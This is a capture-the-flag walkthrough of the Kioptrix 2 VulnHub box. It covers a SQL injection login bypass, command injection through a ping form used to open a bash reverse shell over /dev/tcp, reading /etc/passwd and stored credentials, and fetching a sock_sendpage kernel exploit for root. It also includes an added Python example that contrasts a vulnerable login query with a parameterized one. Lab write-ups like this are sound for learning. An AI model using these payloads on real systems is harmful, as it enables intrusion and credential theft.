Kioptrix 2 Walkthrough

Kioptrix 2 VulnHub Walkthrough

I started this box with a netdiscover scan. It found the box's IP:

netdiscover -r

Discovered some open ports

SSH info

Apache webserver with version and OS info

Some info over https

Looks like this sites running php

We also have a cups server

And a mysql server that our IP isn’t permitted to connect to:

OS and kernel info

The first thing I tried to enumerate was the webserver. I browsed to it and found a login page.

I tried the most basic payload, ' or 1=1-- , for both the username and the password, and it logged me in successfully!
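To show why that payload works and what stops it, here is an added example (my own code, not the Kioptrix login page or anything from the box): the same login check written once with string concatenation and once with bound parameters, run against a constructed in-memory SQLite table standing in for the box's MySQL users table (table name, column names and passwords are all assumptions). The `--` turns the rest of the concatenated query into a comment, so `username='' or 1=1` matches every row; with parameters the same string is compared as a literal and matches nothing.

```python
import sqlite3


def make_db():
    """Constructed demo table; not the box's real schema or credentials."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('admin', 'constructed-admin-pw')")
    conn.execute("INSERT INTO users VALUES ('john', 'constructed-john-pw')")
    conn.commit()
    return conn


def login_vulnerable(conn, username, password):
    """Concatenates user input into the SQL text, so quotes and '--'
    become syntax. Returns the matched username or None."""
    query = ("SELECT username FROM users WHERE username='" + username +
             "' AND password='" + password + "'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None


def login_parameterized(conn, username, password):
    """Binds user input as parameters, so it is compared as data and
    never parsed as SQL. Returns the matched username or None."""
    row = conn.execute(
        "SELECT username FROM users WHERE username=? AND password=?",
        (username, password),
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    payload = "' or 1=1--"
    print("vulnerable:    ", login_vulnerable(db, payload, payload))
    print("parameterized: ", login_parameterized(db, payload, payload))
```

Note that a WordPress-style editor turns `--` into an en dash; the payload only comments out the trailing quote if the two ASCII hyphens survive.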

The prompt asked for a machine to ping, so let’s give it a try:

I tried to inject some code in the text box by trying a couple different syntax commands from various languages.

It seems like the box is running a bash script. Since ";" allows additional commands to be chained onto the user input variable, let's see if we can get a reverse shell.

I issued a bash command to connect back to my machine 🙂

;bash -i >& /dev/tcp/ 0>&1

After checking my present dir and looking at some of the files, I found a username and password in the index.php file

I also issued a cat /etc/passwd and found the user john on the system.

I tried the MySQL DB first and was able to log in.

I looked through the databases and found a couple of usernames and passwords.

The admin password logged me into the web app just like the SQLi, but the john user just presented me with a blank screen. I tried these passwords in combination with john/admin/root over SSH, but had no luck.

I decided I needed some help, so I wanted to download Linux Exploit Suggester. I issued a command to find world-writable directories.

/var/tmp looks like a good choice. I cd'd to that dir and downloaded it there.

It found a number of potential vulnerabilities

I tried a half_nelson exploit with no success, but on a second try was successful with the sock_sendpage vuln. I downloaded the exploit to my Kali machine, then fetched it with wget from the vulnerable VM.

I chmod'd the file and ran it, and now we have root!
